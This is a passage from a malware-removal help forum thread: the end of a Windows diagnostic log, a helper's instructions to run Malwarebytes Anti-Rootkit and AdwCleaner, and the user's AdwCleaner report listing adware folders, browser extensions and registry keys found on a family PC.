Task: C:\Windows\Tasks\User_Feed_Synchronization-{F9D43FD3-5681-4AEF-A862-17FF1653F989}.job => C:\Windows\system32\msfeedssync.exe

==================== Loaded Modules (whitelisted) =============

2014-11-01 04:12 - 2014-11-01 04:12 - 02898944 _____ () C:\Program Files\Alwil Software\Avast5\defs\14110100\algo.dll
2013-04-20 12:07 - 2012-10-04 19:50 - 00088688 _____ () C:\Windows\System32\cpwmon2k.dll
2014-04-23 16:05 - 2014-04-23 16:05 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-04-23 16:04 - 2014-04-23 16:04 - 01044808 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-06-15 19:47 - 2014-06-15 19:47 - 03000776 _____ () c:\Program Files\Optimizer Pro\OptProCrash.dll
2014-06-15 19:47 - 2014-06-15 19:47 - 00186496 _____ () c:\Program Files\Optimizer Pro\OptProCrashSvc.dll
2013-12-14 20:06 - 2014-10-26 21:28 - 38561576 _____ () C:\Program Files\Alwil Software\Avast5\libcef.dll
2014-10-26 19:56 - 2014-10-26 19:56 - 16832176 _____ () C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:D1B5B4F1

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: SDTray => "C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"

========================= Accounts: ==========================

Administrator (S-1-5-21-2927482541-673307907-4085399872-500 - Administrator - Disabled) => C:\Users\Administrator
Bill (S-1-5-21-2927482541-673307907-4085399872-1004 - Administrator - Enabled) => C:\Users\Bill
Dylan (S-1-5-21-2927482541-673307907-4085399872-1007 - Administrator - Enabled) => C:\Users\Dylan
Guest (S-1-5-21-2927482541-673307907-4085399872-501 - Limited - Enabled)
Hannah (S-1-5-21-2927482541-673307907-4085399872-1002 - Administrator - Enabled) => C:\Users\Hannah
Kristi (S-1-5-21-2927482541-673307907-4085399872-1001 - Administrator - Enabled) => C:\Users\Kristi
Nick (S-1-5-21-2927482541-673307907-4085399872-1003 - Administrator - Enabled) => C:\Users\Nick
UpdatusUser (S-1-5-21-2927482541-673307907-4085399872-1006 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Faulty Device Manager Devices =============

Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/30/2014 10:20:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application plugin-container.exe, version 33.0.0.5397, time stamp 0x543924b1, faulting module mozalloc.dll, version 33.0.0.5397, time stamp 0x5438ffbb, exception code 0x80000003, fault offset 0x00001425,
process id 0x17e4, application start time 0xplugin-container.exe0.

Error: (10/28/2014 05:02:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 05:02:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 01:09:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 01:09:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 00:07:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/28/2014 00:07:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (10/26/2014 09:47:08 PM) (Source: EventSystem) (EventID: 4621) (User: )
Description: 80070005EventSystem.EventSubscription{3D5FF3C9-BBDE-4FC0-8CA7-6D8B7030DB7F}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}

Error: (10/26/2014 09:26:26 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.


Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {ef073e62-b48c-4607-8410-c77b7817eddf}

Error: (10/26/2014 08:55:47 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.


System errors:
=============
Error: (11/01/2014 09:59:28 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:59:24 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Foxit Reader PDF Printer Driver required for printer Foxit Reader PDF Printer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:59:23 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Canon MG6100 series Printer required for printer Canon MG6100 series is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:59:22 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver CutePDF Writer required for printer CutePDF Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:51:25 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:51:24 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Foxit Reader PDF Printer Driver required for printer Foxit Reader PDF Printer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:51:22 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver CutePDF Writer required for printer CutePDF Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (11/01/2014 09:51:12 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Canon MG6100 series Printer required for printer Canon MG6100 series is unknown. Contact the administrator to install the driver before you log in again.

Error: (10/28/2014 01:49:31 PM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Remote Desktop Easy Print required for printer Library 3rd Floor (redirected 4) is unknown. Contact the administrator to install the driver before you log in again.

Error: (10/28/2014 01:49:30 PM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Remote Desktop Easy Print required for printer Microsoft XPS Document Writer (redirected 4) is unknown. Contact the administrator to install the driver before you log in again.


Microsoft Office Sessions:
=========================
Error: (10/30/2014 10:20:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: plugin-container.exe33.0.0.5397543924b1mozalloc.dll33.0.0.53975438ffbb800000030000142517e401cff3e926609579

Error: (10/28/2014 05:02:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 05:02:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 01:09:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 01:09:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 00:07:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/28/2014 00:07:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe

Error: (10/26/2014 09:47:08 PM) (Source: EventSystem) (EventID: 4621) (User: )
Description: 80070005EventSystem.EventSubscription{3D5FF3C9-BBDE-4FC0-8CA7-6D8B7030DB7F}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}

Error: (10/26/2014 09:26:26 PM) (Source: VSS) (EventID: 8194) (User: )
Description: 0x80070005

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {ef073e62-b48c-4607-8410-c77b7817eddf}

Error: (10/26/2014 08:55:47 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{AF7EBCA4-9FAF-4DC8-8D09-67854BB84D34}\recordingmanager.exe


CodeIntegrity Errors:
===================================
  Date: 2014-10-28 13:09:19.188
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 21:55:16.603
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 21:36:12.258
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:55:47.708
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:07:50.922
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:07:50.312
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:07:49.712
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:07:49.081
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:07:47.881
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-10-26 20:07:47.271
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: AMD Athlon™ 64 X2 Dual Core Processor 4600+
Percentage of memory in use: 54%
Total physical RAM: 2045.19 MB
Available physical RAM: 934.88 MB
Total Pagefile: 4338.87 MB
Available Pagefile: 3003.78 MB
Total Virtual: 3071.88 MB
Available Virtual: 2913 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.83 GB) (Free:28.27 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.8 GB) (Disk ID: 8173F041)
Partition 1: (Active) - (Size=232.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 01 November 2014 - 12:17 PM

Hello topper8281,

Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Be sure to print out and follow the instructions provided on that same page.
  • Caution: This is a beta version so please be sure to read the disclaimer and back up all your data before using.
  • Scan your system for malware
With some infections, you may see two messages boxes.
  • 'Could not load protection driver'. Click 'OK'.
  • 'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.
  • If malware is found - do not press the Clean up button, please go to the MBAR folder and then copy/paste the contents of the MBAR-log-***.txt file to your next reply.
  • If there is no malware found, please let me know as well.

***


Please download AdwCleaner by Xplode and save to your Desktop.
Double-click AdwCleaner.exe
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
    When the scan has finished, the actual line should say "Pending. Please uncheck elements you do not want to remove" => scan is complete.
  • After the scan has finished, click on the Report button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.
  • The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it.
    If you see an entry you want to keep, let me know about it.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.

***


Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#5 topper8281

topper8281
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:11:33 AM

Posted 01 November 2014 - 01:07 PM

Although I got a warning at first about "AppInit_Dlls", when I first opened Malware bytes anti rootkit, the scan did not find any malware at all. I added a screenshot of this error to this post though. I clicked "No" to the box that it showed me.

 

Now, here is the log for AdwCleaner. You didn't say whether I should remove anything or not, so I didn't. But I kept that program open on the computer after the scan finished in case you want me to.

 

# AdwCleaner v3.311 - Report created 01/11/2014 at 10:55:50
# Updated 30/09/2014 by Xplode
# Operating System : Windows Vista ™ Ultimate Service Pack 2 (32 bits)
# Username : Nick - WALKER-PC
# Running from : C:\Users\Nick\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****

Service Found : ca82e1a5

***** [ Files / Folders ] *****

Folder Found : C:\Program Files\Conduit
Folder Found : C:\Program Files\Optimizer Pro
Folder Found : C:\Program Files\Search Toolbar
Folder Found : C:\ProgramData\FlaashCoupon
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\optimizer pro v3.2
Folder Found : C:\ProgramData\QueenCoupioon
Folder Found : C:\ProgramData\SaalesCheckEr
Folder Found : C:\ProgramData\SaLesChheckueR
Folder Found : C:\ProgramData\SaveItCoupons
Folder Found : C:\ProgramData\Webusavveer
Folder Found : C:\Users\Bill\AppData\LocalLow\Conduit
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\ioooiaooqff@dejai.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\ioooiaooqff@dejai.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yzfw@rvhdxng.org
Folder Found : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yzfw@rvhdxng.org
Folder Found : C:\Users\Hannah\AppData\LocalLow\Conduit
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\ioooiaooqff@dejai.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\ioooiaooqff@dejai.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yzfw@rvhdxng.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yzfw@rvhdxng.org
Folder Found : C:\Users\Hannah\AppData\Roaming\Optimizer Pro
Folder Found : C:\Users\Hannah\AppData\Roaming\Search Protection
Folder Found : C:\Users\Hannah\Documents\Optimizer Pro
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\ioooiaooqff@dejai.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\ioooiaooqff@dejai.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\TkUtuf@Yi.edu
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\TkUtuf@Yi.edu
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\TkUtuf@Yi.edu
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yzfw@rvhdxng.org
Folder Found : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yzfw@rvhdxng.org
Folder Found : C:\Users\Nick\AppData\Local\Conduit
Folder Found : C:\Users\Nick\AppData\Local\Temp\rightsurf
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\ConduitCommon
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Found : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\StumbleUpon
Folder Found : C:\Users\Nick\AppData\Roaming\registry mechanic

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Data Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~1\optimi~1\optpro~2.dll
Data Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll
Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKCU\Software\AppDataLow\Software\Conduit
Key Found : HKCU\Software\AppDataLow\Software\SmartBar
Key Found : HKCU\Software\AppDataLow\Toolbar
Key Found : HKCU\Software\IM
Key Found : HKCU\Software\ImInstaller
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Optimizer Pro_is1
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SearchProtect
Key Found : HKCU\Software\Softonic
Key Found : HKCU\Software\YahooPartnerToolbar
Key Found : HKCU\Software\Zugo
Key Found : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\Toolbar.CT3072253
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\SOFTWARE\Conduit
Key Found : HKLM\SOFTWARE\ImInstaller
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6F10CA8F-97E3-48FB-9003-3EE8E9050577}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B114619-78B7-1CFF-55EF-74266954F883}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B114619-78B7-1CFF-55EF-74266954F883}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CC17A332-9555-AD95-3985-0BDD9BF0EC71}
Key Found : HKLM\SOFTWARE\PIP

***** [ Browsers ] *****

-\\ Internet Explorer v7.0.6002.18005


-\\ Mozilla Firefox v33.0 (x86 en-US)

[ File : C:\Users\Bill\AppData\Roaming\Mozilla\Firefox\Profiles\klr418dz.default-1405037272113\prefs.js ]

